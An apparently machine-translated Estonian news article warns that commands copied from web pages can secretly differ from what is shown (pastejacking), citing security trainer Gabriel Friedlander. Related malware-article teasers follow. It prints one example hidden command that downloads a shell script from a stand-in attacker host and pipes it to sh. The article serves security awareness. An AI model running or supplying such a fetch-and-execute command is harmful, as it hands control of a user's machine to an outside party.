Kuidas kopeerimine ja kleepimine võib teile rohkem probleeme tekitada, kui arvate

  • Me kõik kopeerime ja kleepime igapäevaselt Internetist, teadmata tegelikult riske.
  • Turvaekspert võttis seda tehes aega, et näidata kõigile halvimat stsenaariumit.
  • Internetist saadud käskude kleepimine terminali on kiire viis häkkimiseks
  • Käsud, mida arvasite terminali kleepivat, on tegelikult pahatahtlikud koodid.
häkker

On tõsi, et me elame ajastul, kus kiirus on kõik ja kiirete tulemuste saavutamine on oluline. Kuid vähesed inimesed peatuvad hetkeks ja mõtlevad tagajärgede peale.

Miljonid programmeerijad, administraatorid ja turbeuurijad täidavad igapäevaselt lihtsaid ülesandeid, nagu veebilehtedelt käskude kopeerimine ja kleepimine otse oma arvuti konsoolidele.

Kuigi paljud sellele isegi ei mõtle, on tagajärjed suuremad ja ohtlikumad, kui esialgu arvata võiks, eriti kui talletate tundlikke või väärtuslikke andmeid.

Tuntud turvaekspert leidis aja jagamiseks mis tegelikult juhtuda võiks kui kopeerite+kleepite sisu veebilehtedelt.

Kopeeri+kleebi on lihtne viis häkkimiseks

Gabriel Friedlander, kes on turvateadlikkuse koolitusplatvormi Wizer asutaja, tõmbas kaane pealt skeemilt, mis paneb sind enne veebilehtedelt käskude kopeerimist ja kleepimist kaks korda järele mõtlema.

Internetist sisu kopeerimine ja kleepimine on tänapäeval muutunud nii tavaliseks, et keegi ei mõtle sellele isegi.

Siiski hoiatab Friedlander, et mõned veebilehed on petlikumad, kui esmapilgul arvata võiks, ja see, mida arvate, et olete sealt kopeerinud, on väga erinev sellest, mida te tegelikult tegite.

Ja kõige hullem on selle kõige juures see, et ilma vajalike teadmiste või juhendamiseta saavad ohvrid oma veast aru alles pärast teksti kleepimist, misjärel võib olla juba hilja.

Turvaanalüütik mõtles oma ajaveebi lugejatele välja ka väikese testi, et inimesed saaksid tegelikult aru, kui lihtne on teil küberkurjategijatele tahtmatult ust avada.

Ta andis käsu, mis on mõeldud kopeerimiseks, kuid puudutav tõde selgub alles siis, kui kleepite teksti ja vaatate, mida te oma seadistuses tegelikult tutvustasite.

Pärast ülaloleval ekraanipildil näidatud käsu kopeerimist šokeerib selle kleepimise tulemus teid, kuna see on kaugel sellest, mida arvasite kopeerivat.

lokk http://attacker-domain: 8000/shell.sh | sh

Lisaks teie lõikepuhvril olevale täiesti erinevale käsule on reavahetus (või tagastamismärk) at selle lõpp tähendab, et ülaltoodud näide käivitub kohe, kui see on otse Linuxi kleebitud terminal.

Seega on parem olla teadlikum sellest, mis tegelikult toimub, ja käsitleda seda tõsise ohuna. Me ei ütle, et kõik veebisaidid peidavad pahatahtlikku sisu, kuid sellega tasub arvestada.

Kas teid on kunagi häkitud, kuna olete oma terminali kleepinud keerulisi käske? Jagage oma kogemusi meiega allpool olevas kommentaaride jaotises.

SUPERAntiSpyware vs Malwarebytes: kumba peaksite kasutama?

SUPERAntiSpyware vs Malwarebytes: kumba peaksite kasutama?PahavaraPahavara Eemaldamine

Pahavara eemaldamine pole lihtne ülesanne ja paljud kasutajad mõtlevad, milline tööriist on pahavara eemaldamiseks parem, kas SUPERAntiSpyware või Malwarebytes?SUPERAntiSpyware pakub huvitavaid fun...

Loe rohkem
Microsoft võtab meetmeid Phorpeixi pahavara botnetiohu vastu

Microsoft võtab meetmeid Phorpeixi pahavara botnetiohu vastuPahavara

Microsofti turvameeskond uurib praegu kurikuulsat Phorpiexi botnet'i.See on teada, et pahatahtlik tarkvara levitab Avaddoni lunavara kasutaja arvutites.Phorpiexi bot keelab rünnaku korraldamiseks v...

Loe rohkem
Teadlased avaldavad teavet Windows 10 UAC pahavara kohta

Teadlased avaldavad teavet Windows 10 UAC pahavara kohtaPahavaraUacWindows 10

Windows 10 on operatsioonisüsteem, mis pakub muu hulgas ka suuremat turvalisust. Täiustatud turvafunktsioonid pole aga täiuslikud, kuna on leitud uus haavatavus ja see võib avada operatsioonisüstee...

Loe rohkem